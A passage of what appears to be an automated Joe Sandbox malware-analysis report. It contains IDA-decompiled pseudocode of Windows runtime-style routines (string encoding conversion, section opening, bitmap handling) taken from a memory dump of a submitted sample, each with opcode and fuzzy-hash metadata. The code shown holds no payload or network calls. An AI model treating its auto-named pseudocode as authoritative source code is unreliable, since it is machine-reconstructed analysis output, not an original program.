                            								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                            								L0172FFB0(_t210, _t249, _t249);
                            								_t222 = _v76;
                            								_t172 = _v80;
                            								_t208 = _v84;
                            								_t247 = _v88;
                            								L10:
                            								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                            								_v44 = _t238;
                            								if(_t238 != 0) {
                            									 *0x180b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                            									_v44();
                            								}
                            								_pop(_t248);
                            								_pop(_t252);
                            								_pop(_t209);
                            								return L0175B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                            							}
                            							_t181 = _v92;
                            							L31:
                            							_t226 = _t226 + 1;
                            							_t181 =  &(_t181[0x18]);
                            							_v88 = _t226;
                            							_v92 = _t181;
                            						} while (_t226 < 4);
                            						goto L34;
                            					}
                            					L9:
                            					_t172 = _v104;
                            					_t222 = _v100;
                            					goto L10;
                            				}
                            				_t247 = _t246 | 0xffffffff;
                            				_t208 = _t247;
                            				_v84 = _t247;
                            				_v80 = _t208;
                            				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                            					_t233 = _v72;
                            					_v105 = _v64;
                            					_t202 = _v76;
                            				} else {
                            					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                            					_v105 = 1;
                            					if(_v63 <= _t204) {
                            						_v63 = _t204;
                            					}
                            					_t202 = _v76 |  *(_t251 + 0x40);
                            					_t233 = _v72 |  *(_t251 + 0x44);
                            					_t247 =  *(_t251 + 0x38);
                            					_t208 =  *(_t251 + 0x3c);
                            					_v76 = _t202;
                            					_v72 = _t233;
                            					_v84 = _t247;
                            					_v80 = _t208;
                            				}
                            				_v104 = _t202;
                            				_v100 = _t233;
                            				if( *((char*)(_t251 + 0xc4)) != 0) {
                            					_t237 = _v48;
                            					_v105 = 1;
                            					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                            						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                            						_t237 = _v48;
                            					}
                            					_t203 = _t202 |  *(_t251 + 0xb8);
                            					_t234 = _t233 |  *(_t251 + 0xbc);
                            					_t247 = _t247 &  *(_t251 + 0xb0);
                            					_t208 = _t208 &  *(_t251 + 0xb4);
                            					_v104 = _t203;
                            					_v76 = _t203;
                            					_v100 = _t234;
                            					_v72 = _t234;
                            					_v84 = _t247;
                            					_v80 = _t208;
                            				}
                            				if(_v105 == 0) {
                            					_v36 = _v36 & 0x00000000;
                            					_t208 = 0;
                            					_t247 = 0;
                            					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                            					goto L19;
                            				} else {
                            					_v36 = 1;
                            					goto L8;
                            				}
                            			}


                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0a8d7c375a6cfddfedd23b3f63eddf8eb11903d30c72c4c3a9aaa72b4fc742b5
                            • Instruction ID: eadbc3505ff55a214b91ad796464502660f765bf773bcbd17f78ceae8013bc65
                            • Opcode Fuzzy Hash: 0a8d7c375a6cfddfedd23b3f63eddf8eb11903d30c72c4c3a9aaa72b4fc742b5
                            • Instruction Fuzzy Hash: F6C132B55083819FD354CF28C480A5AFBF1BF88704F144A6EF9998B392D770E985CB42
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 74%
                            			E017403E2(signed int __ecx, signed int __edx) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				signed int _v36;
                            				intOrPtr _v40;
                            				signed int _v44;
                            				signed int _v48;
                            				char _v52;
                            				char _v56;
                            				char _v64;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t56;
                            				signed int _t58;
                            				char* _t64;
                            				intOrPtr _t65;
                            				signed int _t74;
                            				signed int _t79;
                            				char* _t83;
                            				intOrPtr _t84;
                            				signed int _t93;
                            				signed int _t94;
                            				signed char* _t95;
                            				signed int _t99;
                            				signed int _t100;
                            				signed char* _t101;
                            				signed int _t105;
                            				signed int _t119;
                            				signed int _t120;
                            				void* _t122;
                            				signed int _t123;
                            				signed int _t127;
                            
                            				_v8 =  *0x180d360 ^ _t127;
                            				_t119 = __ecx;
                            				_t105 = __edx;
                            				_t118 = 0;
                            				_v20 = __edx;
                            				_t120 =  *(__ecx + 0x20);
                            				if(E01740548(__ecx, 0) != 0) {
                            					_t56 = 0xc000022d;
                            					L23:
                            					return L0175B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                            				} else {
                            					_v12 = _v12 | 0xffffffff;
                            					_t58 = _t120 + 0x24;
                            					_t109 =  *(_t120 + 0x18);
                            					_t118 = _t58;
                            					_v16 = _t58;
                            					E0172B02A( *(_t120 + 0x18), _t118, 0x14a5);
                            					_v52 = 0x18;
                            					_v48 = 0;
                            					0x840 = 0x40;
                            					if( *0x1807c1c != 0) {
                            					}
                            					_v40 = 0x840;
                            					_v44 = _t105;
                            					_v36 = 0;
                            					_v32 = 0;
                            					if(E01737D50() != 0) {
                            						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					} else {
                            						_t64 = 0x7ffe0384;
                            					}
                            					if( *_t64 != 0) {
                            						_t65 =  *[fs:0x30];
                            						__eflags =  *(_t65 + 0x240) & 0x00000004;
                            						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                            							_t100 = E01737D50();
                            							__eflags = _t100;
                            							if(_t100 == 0) {
                            								_t101 = 0x7ffe0385;
                            							} else {
                            								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            							}
                            							__eflags =  *_t101 & 0x00000020;
                            							if(( *_t101 & 0x00000020) != 0) {
                            								_t118 = _t118 | 0xffffffff;
                            								_t109 = 0x1485;
                            								E01797016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                            							}
                            						}
                            					}
                            					_t105 = 0;
                            					while(1) {
                            						_push(0x60);
                            						_push(5);
                            						_push( &_v64);
                            						_push( &_v52);
                            						_push(0x100021);
                            						_push( &_v12);
                            						_t122 = E01759830();
                            						if(_t122 >= 0) {
                            							break;
                            						}
                            						__eflags = _t122 - 0xc0000034;
                            						if(_t122 == 0xc0000034) {
                            							L38:
                            							_t120 = 0xc0000135;
                            							break;
                            						}
                            						__eflags = _t122 - 0xc000003a;
                            						if(_t122 == 0xc000003a) {
                            							goto L38;
                            						}
                            						__eflags = _t122 - 0xc0000022;
                            						if(_t122 != 0xc0000022) {
                            							break;
                            						}
                            						__eflags = _t105;
                            						if(__eflags != 0) {
                            							break;
                            						}
                            						_t109 = _t119;
                            						_t99 = E017969A6(_t119, __eflags);
                            						__eflags = _t99;
                            						if(_t99 == 0) {
                            							break;
                            						}
                            						_t105 = _t105 + 1;
                            					}
                            					if( !_t120 >= 0) {
                            						L22:
                            						_t56 = _t120;
                            						goto L23;
                            					}
                            					if( *0x1807c04 != 0) {
                            						_t118 = _v12;
                            						_t120 = L0179A7AC(_t119, _t118, _t109);
                            						__eflags = _t120;
                            						if(_t120 >= 0) {
                            							goto L10;
                            						}
                            						__eflags =  *0x1807bd8;
                            						if( *0x1807bd8 != 0) {
                            							L20:
                            							if(_v12 != 0xffffffff) {
                            								_push(_v12);
                            								E017595D0();
                            							}
                            							goto L22;
                            						}
                            					}
                            					L10:
                            					_push(_v12);
                            					_t105 = _t119 + 0xc;
                            					_push(0x1000000);
                            					_push(0x10);
                            					_push(0);
                            					_push(0);
                            					_push(0xf);
                            					_push(_t105);
                            					_t120 = E017599A0();
                            					if(_t120 < 0) {
                            						__eflags = _t120 - 0xc000047e;
                            						if(_t120 == 0xc000047e) {
                            							L51:
                            							_t74 = E01793540(_t120);
                            							_t119 = _v16;
                            							_t120 = _t74;
                            							L52:
                            							_t118 = 0x1485;
                            							E0171B1E1(_t120, 0x1485, 0, _t119);
                            							goto L20;
                            						}
                            						__eflags = _t120 - 0xc000047f;
                            						if(_t120 == 0xc000047f) {
                            							goto L51;
                            						}
                            						__eflags = _t120 - 0xc0000462;
                            						if(_t120 == 0xc0000462) {
                            							goto L51;
                            						}
                            						_t119 = _v16;
                            						__eflags = _t120 - 0xc0000017;
                            						if(_t120 != 0xc0000017) {
                            							__eflags = _t120 - 0xc000009a;
                            							if(_t120 != 0xc000009a) {
                            								__eflags = _t120 - 0xc000012d;
                            								if(_t120 != 0xc000012d) {
                            									_v28 = _t119;
                            									_push( &_v56);
                            									_push(1);
                            									_v24 = _t120;
                            									_push( &_v28);
                            									_push(1);
                            									_push(2);
                            									_push(0xc000007b);
                            									_t79 = E0175AAF0();
                            									__eflags = _t79;
                            									if(_t79 >= 0) {
                            										__eflags =  *0x1808474 - 3;
                            										if( *0x1808474 != 3) {
                            											 *0x18079dc =  *0x18079dc + 1;
                            										}
                            									}
                            								}
                            							}
                            						}
                            						goto L52;
                            					}
                            					if(E01737D50() != 0) {
                            						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                            					} else {
                            						_t83 = 0x7ffe0384;
                            					}
                            					if( *_t83 != 0) {
                            						_t84 =  *[fs:0x30];
                            						__eflags =  *(_t84 + 0x240) & 0x00000004;
                            						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                            							_t94 = E01737D50();
                            							__eflags = _t94;
                            							if(_t94 == 0) {
                            								_t95 = 0x7ffe0385;
                            							} else {
                            								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                            							}
                            							__eflags =  *_t95 & 0x00000020;
                            							if(( *_t95 & 0x00000020) != 0) {
                            								E01797016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                            							}
                            						}
                            					}
                            					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                            						if( *0x1808708 != 0) {
                            							_t118 =  *0x7ffe0330;
                            							_t123 =  *0x1807b00; // 0x0
                            							asm("ror esi, cl");
                            							 *0x180b1e0(_v12, _v20, 0x20);
                            							_t93 =  *(_t123 ^  *0x7ffe0330)();
                            							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                            							asm("sbb esi, esi");
                            							_t120 =  ~_t50 & _t93;
                            						} else {
                            							_t120 = 0;
                            						}
                            					}
                            					if( !_t120 >= 0) {
                            						L19:
                            						_push( *_t105);
                            						E017595D0();
                            						 *_t105 =  *_t105 & 0x00000000;
                            						goto L20;
                            					}
                            					_t120 = L01727F65(_t119);
                            					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                            						__eflags = _t120;
                            						if(_t120 < 0) {
                            							goto L19;
                            						}
                            						 *(_t119 + 0x64) = _v12;
                            						goto L22;
                            					}
                            					goto L19;
                            				}
                            			}


                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 7a5f188adff9fb7957fbe086a2cdb728b7c95ba27a2b7198a0d65acb6210e816
                            • Instruction ID: 755758c82846d9f687abe5be20f2f93eb7ee3004855e6036e295cc87bb091407
                            • Opcode Fuzzy Hash: 7a5f188adff9fb7957fbe086a2cdb728b7c95ba27a2b7198a0d65acb6210e816
                            • Instruction Fuzzy Hash: 88911931E4021A9FEB32AB6CC848BADFBA4EB05724F150265FB11A72D1D7B49D40CBD1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E0174EBB0(signed int* _a4, intOrPtr _a8, intOrPtr* _a12, signed short* _a16, unsigned int _a20) {
                            				signed short* _v8;
                            				intOrPtr _v12;
                            				intOrPtr _v16;
                            				unsigned int _v20;
                            				intOrPtr _t42;
                            				unsigned int _t43;
                            				unsigned int _t50;
                            				signed char _t56;
                            				signed char _t60;
                            				signed int _t63;
                            				signed int _t73;
                            				signed int _t77;
                            				signed int _t80;
                            				unsigned int _t82;
                            				signed int _t87;
                            				signed int _t91;
                            				signed short _t96;
                            				signed short* _t98;
                            				signed char _t100;
                            				signed int* _t102;
                            				signed short* _t105;
                            				intOrPtr _t106;
                            				signed int _t108;
                            				signed int* _t110;
                            				void* _t113;
                            				signed int _t115;
                            				signed short* _t117;
                            				signed int _t118;
                            
                            				_t98 = _a16;
                            				_t87 = 0;
                            				_v16 = 0;
                            				if(_t98 == 0) {
                            					return 0xc00000f2;
                            				}
                            				_t110 = _a4;
                            				if(_t110 == 0) {
                            					if(_a12 == 0) {
                            						_t42 = 0xc000000d;
                            					} else {
                            						_t42 = E0174ED1A(_t98, _a20, _a12);
                            					}
                            					L19:
                            					return _t42;
                            				}
                            				_t43 = _a20;
                            				if((_t43 & 0x00000001) != 0) {
                            					_t42 = 0xc00000f3;
                            					goto L19;
                            				} else {
                            					_t102 = _t110;
                            					_t105 =  &(_t98[_t43 >> 1]);
                            					_v8 = _t105;
                            					_v12 = _a8 + _t110;
                            					L4:
                            					while(1) {
                            						L4:
                            						while(1) {
                            							L4:
                            							if(_t98 >= _t105) {
                            								if(_t87 == 0) {
                            									L17:
                            									_t106 = _v16;
                            									L18:
                            									_t42 = _t106;
                            									 *_a12 = _t102 - _a4;
                            									goto L19;
                            								}
                            								L8:
                            								_t13 = _t87 - 0xd800; // -55295
                            								if(_t13 <= 0x7ff) {
                            									_v16 = 0x107;
                            									_t87 = 0xfffd;
                            								}
                            								_t113 = 1;
                            								if(_t87 > 0x7f) {
                            									if(_t87 > 0x7ff) {
                            										if(_t87 > 0xffff) {
                            											_t113 = 2;
                            										}
                            										_t113 = _t113 + 1;
                            									}
                            									_t113 = _t113 + 1;
                            								}
                            								if(_t102 > _v12 - _t113) {
                            									_t106 = 0xc0000023;
                            									goto L18;
                            								} else {
                            									if(_t87 > 0x7f) {
                            										_t50 = _t87;
                            										if(_t87 > 0x7ff) {
                            											if(_t87 > 0xffff) {
                            												 *_t102 = _t50 >> 0x00000012 | 0x000000f0;
                            												_t102 =  &(_t102[0]);
                            												_t56 = _t87 >> 0x0000000c & 0x0000003f | 0x00000080;
                            											} else {
                            												_t56 = _t50 >> 0x0000000c | 0x000000e0;
                            											}
                            											 *_t102 = _t56;
                            											_t102 =  &(_t102[0]);
                            											_t60 = _t87 >> 0x00000006 & 0x0000003f | 0x00000080;
                            										} else {
                            											_t60 = _t50 >> 0x00000006 | 0x000000c0;
                            										}
                            										 *_t102 = _t60;
                            										_t102 =  &(_t102[0]);
                            										_t87 = _t87 & 0x0000003f | 0x00000080;
                            									}
                            									 *_t102 = _t87;
                            									_t102 =  &(_t102[0]);
                            									_t63 = _t105 - _t98 >> 1;
                            									_t115 = _v12 - _t102;
                            									if(_t63 > 0xd) {
                            										if(_t115 < _t63) {
                            											_t63 = _t115;
                            										}
                            										_t22 = _t63 - 5; // -5
                            										_t117 =  &(_t98[_t22]);
                            										if(_t98 < _t117) {
                            											do {
                            												_t91 =  *_t98 & 0x0000ffff;
                            												_t100 =  &(_t98[1]);
                            												if(_t91 > 0x7f) {
                            													L58:
                            													if(_t91 > 0x7ff) {
                            														_t38 = _t91 - 0xd800; // -55296
                            														if(_t38 <= 0x7ff) {
                            															if(_t91 > 0xdbff) {
                            																_t98 = _t100 - 2;
                            																break;
                            															}
                            															_t108 =  *_t100 & 0x0000ffff;
                            															_t98 = _t100 + 2;
                            															_t39 = _t108 - 0xdc00; // -54273
                            															if(_t39 > 0x3ff) {
                            																_t98 = _t98 - 4;
                            																break;
                            															}
                            															_t91 = (_t91 << 0xa) + 0xfca02400 + _t108;
                            															 *_t102 = _t91 >> 0x00000012 | 0x000000f0;
                            															_t102 =  &(_t102[0]);
                            															_t73 = _t91 & 0x0003f000 | 0x00080000;
                            															L65:
                            															_t117 = _t117 - 2;
                            															 *_t102 = _t73 >> 0xc;
                            															_t102 =  &(_t102[0]);
                            															_t77 = _t91 & 0x00000fc0 | 0x00002000;
                            															L66:
                            															 *_t102 = _t77 >> 6;
                            															_t117 = _t117 - 2;
                            															_t102[0] = _t91 & 0x0000003f | 0x00000080;
                            															_t102 =  &(_t102[0]);
                            															goto L30;
                            														}
                            														_t73 = _t91 | 0x000e0000;
                            														goto L65;
                            													}
                            													_t77 = _t91 | 0x00003000;
                            													goto L66;
                            												}
                            												 *_t102 = _t91;
                            												_t102 =  &(_t102[0]);
                            												if((_t100 & 0x00000002) != 0) {
                            													_t91 =  *_t100 & 0x0000ffff;
                            													_t100 = _t100 + 2;
                            													if(_t91 > 0x7f) {
                            														goto L58;
                            													}
                            													 *_t102 = _t91;
                            													_t102 =  &(_t102[0]);
                            												}
                            												if(_t100 >= _t117) {
                            													break;
                            												} else {
                            													goto L28;
                            												}
                            												while(1) {
                            													L28:
                            													_t80 =  *(_t100 + 4);
                            													_t96 =  *_t100;
                            													_v20 = _t80;
                            													if(((_t80 | _t96) & 0xff80ff80) != 0) {
                            														break;
                            													}
                            													_t82 = _v20;
                            													_t100 = _t100 + 8;
                            													 *_t102 = _t96;
                            													_t102[0] = _t82;
                            													_t102[0] = _t96 >> 0x10;
                            													_t102[0] = _t82 >> 0x10;
                            													_t102 =  &(_t102[1]);
                            													if(_t100 < _t117) {
                            														continue;
                            													}
                            													goto L30;
                            												}
                            												_t91 = _t96 & 0x0000ffff;
                            												_t100 = _t100 + 2;
                            												if(_t91 > 0x7f) {
                            													goto L58;
                            												}
                            												 *_t102 = _t91;
                            												_t102 =  &(_t102[0]);
                            												L30:
                            											} while (_t98 < _t117);
                            											_t105 = _v8;
                            										}
                            										goto L32;
                            									} else {
                            										if(_t115 < _t63) {
                            											L32:
                            											_t87 = 0;
                            											continue;
                            										}
                            										while(_t98 < _t105) {
                            											_t87 =  *_t98 & 0x0000ffff;
                            											_t98 =  &(_t98[1]);
                            											if(_t87 > 0x7f) {
                            												L7:
                            												_t12 = _t87 - 0xd800; // -55290
                            												if(_t12 <= 0x3ff) {
                            													goto L4;
                            												}
                            												goto L8;
                            											}
                            											 *_t102 = _t87;
                            											_t102 =  &(_t102[0]);
                            										}
                            										goto L17;
                            									}
                            								}
                            							}
                            							_t118 =  *_t98 & 0x0000ffff;
                            							if(_t87 != 0) {
                            								_t36 = _t118 - 0xdc00; // -56314
                            								if(_t36 <= 0x3ff) {
                            									_t87 = (_t87 << 0xa) + 0xfca02400 + _t118;
                            									_t98 =  &(_t98[1]);
                            								}
                            								goto L8;
                            							}
                            							_t87 = _t118;
                            							_t98 =  &(_t98[1]);
                            							goto L7;
                            						}
                            					}
                            				}
                            			}
































                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                            • Instruction ID: c858ccc9031e4e88dd13676321d690b695969959ee16bdae3ead4997a910985a
                            • Opcode Fuzzy Hash: 9fa993315481d34d861e67938bc03e7c42d4ca2921a7b7b75938bf6aa423f69f
                            • Instruction Fuzzy Hash: B6814821A843568FEB215E6CC4C127DFB51FF52324B2C46BBD9828B342C7299886D795
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 90%
                            			E017E1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                            				intOrPtr _t97;
                            				signed int _t101;
                            				signed int _t112;
                            				unsigned int _t113;
                            				signed int _t121;
                            				signed int _t128;
                            				signed int _t130;
                            				signed char _t135;
                            				intOrPtr _t136;
                            				intOrPtr _t137;
                            				signed int _t139;
                            				signed int _t141;
                            				signed int _t143;
                            				signed int _t144;
                            				signed int _t149;
                            				signed int _t150;
                            				void* _t154;
                            				signed int* _t161;
                            				signed int _t163;
                            				signed int _t164;
                            				void* _t167;
                            				intOrPtr _t171;
                            				signed int _t172;
                            				void* _t175;
                            				signed int* _t178;
                            				signed int _t179;
                            				signed int _t180;
                            				signed char _t181;
                            				signed char _t183;
                            				signed int _t187;
                            				signed int _t189;
                            				signed int _t190;
                            				void* _t191;
                            				void* _t197;
                            
                            				_t137 = __ecx;
                            				_push(0x64);
                            				_push(0x17f1070);
                            				E0176D08C(__ebx, __edi, __esi);
                            				 *(_t191 - 0x24) = __edx;
                            				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
                            				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
                            				_t135 = 0;
                            				 *(_t191 - 0x40) = 0;
                            				_t171 =  *((intOrPtr*)(__ecx + 0xc));
                            				_t189 =  *(__ecx + 8);
                            				 *(_t191 - 0x28) = _t189;
                            				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
                            				 *(_t191 - 0x50) = _t189;
                            				_t187 = __edx << 0xf;
                            				 *(_t191 - 0x4c) = _t187;
                            				_t190 = 0x8000;
                            				 *(_t191 - 0x34) = 0x8000;
                            				_t172 = _t171 - _t187;
                            				if(_t172 <= 0x8000) {
                            					_t190 = _t172;
                            					 *(_t191 - 0x34) = _t172;
                            				}
                            				 *(_t191 - 0x68) = _t135;
                            				 *(_t191 - 0x64) = _t135;
                            				L3:
                            				while(1) {
                            					if( *(_t191 + 8) != 0) {
                            						L22:
                            						 *(_t191 + 8) = _t135;
                            						E017E337F(_t137, 1, _t191 - 0x74);
                            						_t97 =  *((intOrPtr*)(_t191 - 0x20));
                            						_t175 =  *(_t97 + 0x14);
                            						 *(_t191 - 0x58) = _t175;
                            						_t139 = _t97 + 0x14;
                            						 *(_t191 - 0x44) = _t139;
                            						_t197 = _t175 - 0xffffffff;
                            						if(_t197 == 0) {
                            							 *_t139 =  *(_t191 - 0x24);
                            							E017E33B6(_t191 - 0x74);
                            							 *(_t191 - 0x40) = 1;
                            							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
                            							_t101 =  *_t60;
                            							_t141 =  *(_t191 - 0x24);
                            							asm("bt [eax], ecx");
                            							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
                            							if(__eflags == 0) {
                            								goto L41;
                            							} else {
                            								_t103 = _t187 - 1 + _t190;
                            								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
                            								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
                            									goto L41;
                            								} else {
                            									__eflags = _t190 - 1;
                            									if(__eflags > 0) {
                            										_t143 =  *(_t191 - 0x28);
                            										_t178 = _t143 + (_t187 >> 5) * 4;
                            										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
                            										 *(_t191 - 0x50) = _t144;
                            										_t112 =  *_t178;
                            										 *(_t191 - 0x54) = _t112;
                            										_t113 = _t112 | 0xffffffff;
                            										__eflags = _t178 - _t144;
                            										if(_t178 != _t144) {
                            											_t103 = _t113 << _t187;
                            											__eflags =  *_t178 & _t103;
                            											if(( *_t178 & _t103) != 0) {
                            												goto L41;
                            											} else {
                            												_t103 =  *(_t191 - 0x50);
                            												while(1) {
                            													_t178 =  &(_t178[1]);
                            													__eflags = _t178 - _t103;
                            													if(_t178 == _t103) {
                            														break;
                            													}
                            													__eflags =  *_t178 - _t135;
                            													if( *_t178 != _t135) {
                            														goto L41;
                            													} else {
                            														continue;
                            													}
                            													goto L42;
                            												}
                            												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
                            												__eflags = _t103;
                            												_t149 =  *_t178;
                            												goto L38;
                            											}
                            										} else {
                            											_t154 = 0x20;
                            											_t103 = _t113 >> _t154 - _t190 << _t187;
                            											_t149 =  *(_t191 - 0x54);
                            											L38:
                            											_t150 = _t149 & _t103;
                            											__eflags = _t150;
                            											asm("sbb cl, cl");
                            											_t135 =  ~_t150 + 1;
                            											_t141 =  *(_t191 - 0x24);
                            											goto L39;
                            										}
                            									} else {
                            										if(__eflags != 0) {
                            											goto L41;
                            										} else {
                            											_t103 =  *(_t191 - 0x28);
                            											asm("bt [eax], edi");
                            											if(__eflags >= 0) {
                            												L40:
                            												_t136 =  *((intOrPtr*)(_t191 - 0x20));
                            												asm("lock btr [eax], ecx");
                            												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
                            												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
                            												_push(0x4000);
                            												_push(_t191 - 0x5c);
                            												_push(_t191 - 0x60);
                            												_push(0xffffffff);
                            												_t103 = E017596E0();
                            											} else {
                            												L39:
                            												__eflags = _t135;
                            												if(_t135 == 0) {
                            													goto L41;
                            												} else {
                            													goto L40;
                            												}
                            											}
                            										}
                            									}
                            								}
                            							}
                            						} else {
                            							E017E33B6(_t191 - 0x74);
                            							_t172 = _t191 - 0x58;
                            							E0174E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x1805880);
                            							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
                            							_t121 =  *_t51;
                            							asm("bt [eax], ecx");
                            							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
                            							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
                            								goto L41;
                            							} else {
                            								_t137 =  *((intOrPtr*)(_t191 - 0x20));
                            								continue;
                            							}
                            						}
                            					} else {
                            						 *(_t191 - 4) = _t135;
                            						_t103 = _t187 - 1 + _t190;
                            						 *(_t191 - 0x30) = _t103;
                            						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
                            							__eflags = _t190 - 1;
                            							if(__eflags > 0) {
                            								_t179 =  *(_t191 - 0x28);
                            								_t161 = _t179 + (_t187 >> 5) * 4;
                            								 *(_t191 - 0x2c) = _t161;
                            								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
                            								 *(_t191 - 0x44) = _t128;
                            								_t180 =  *_t161;
                            								__eflags = _t161 - _t128;
                            								if(_t161 != _t128) {
                            									_t103 = (_t128 | 0xffffffff) << _t187;
                            									__eflags = _t103 & _t180;
                            									if((_t103 & _t180) != 0) {
                            										goto L5;
                            									} else {
                            										_t130 =  *(_t191 - 0x2c);
                            										_t164 =  *(_t191 - 0x44);
                            										while(1) {
                            											_t130 = _t130 + 4;
                            											 *(_t191 - 0x2c) = _t130;
                            											_t180 =  *_t130;
                            											__eflags = _t130 - _t164;
                            											if(_t130 == _t164) {
                            												break;
                            											}
                            											__eflags = _t180;
                            											if(_t180 == 0) {
                            												continue;
                            											} else {
                            												goto L5;
                            											}
                            											goto L19;
                            										}
                            										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
                            										__eflags = _t103;
                            										goto L17;
                            									}
                            								} else {
                            									_t167 = 0x20;
                            									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
                            									L17:
                            									_t183 =  ~(_t180 & _t103);
                            									asm("sbb dl, dl");
                            									goto L18;
                            								}
                            							} else {
                            								if(__eflags != 0) {
                            									goto L5;
                            								} else {
                            									_t103 =  *(_t191 - 0x28);
                            									asm("bt [eax], edi");
                            									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
                            									asm("sbb dl, dl");
                            									L18:
                            									_t181 = _t183 + 1;
                            									__eflags = _t181;
                            								}
                            							}
                            						} else {
                            							L5:
                            							_t181 = _t135;
                            						}
                            						L19:
                            						 *(_t191 - 0x19) = _t181;
                            						_t163 = _t181 & 0x000000ff;
                            						 *(_t191 - 0x48) = _t163;
                            						 *(_t191 - 4) = 0xfffffffe;
                            						if(_t163 == 0) {
                            							L41:
                            							_t136 =  *((intOrPtr*)(_t191 - 0x20));
                            						} else {
                            							_t137 =  *((intOrPtr*)(_t191 - 0x20));
                            							goto L22;
                            						}
                            					}
                            					L42:
                            					__eflags =  *(_t191 - 0x40);
                            					if( *(_t191 - 0x40) != 0) {
                            						_t91 = _t136 + 0x14; // 0x14
                            						_t142 = _t91;
                            						 *_t91 = 0xffffffff;
                            						__eflags = 0;
                            						asm("lock or [eax], edx");
                            						_t103 = L0174DFDF(_t91, 1, _t142);
                            					}
                            					return E0176D0D1(_t103);
                            				}
                            			}

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • Opcode ID: ae84012a428e44b2dda656123dbb1a1589ab6ca36892d9da08bb940abd60a409
                            • Instruction ID: 43b1c3b24c1a027a2ca8914f2d3423c19dd354c484eccf0be14d4e1e14b0ea9b
                            • Opcode Fuzzy Hash: ae84012a428e44b2dda656123dbb1a1589ab6ca36892d9da08bb940abd60a409
                            • Instruction Fuzzy Hash: 0F819A31E012198FCF18CFA8C8859ECFBF2BF5D324B644269E412AB385DB319945CB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 93%
                            			E017DDBD2(intOrPtr* __ecx, unsigned int __edx, intOrPtr _a4, intOrPtr _a8) {
                            				char _v5;
                            				signed short _v12;
                            				unsigned int _v16;
                            				intOrPtr* _v20;
                            				signed int _v24;
                            				signed int _v28;
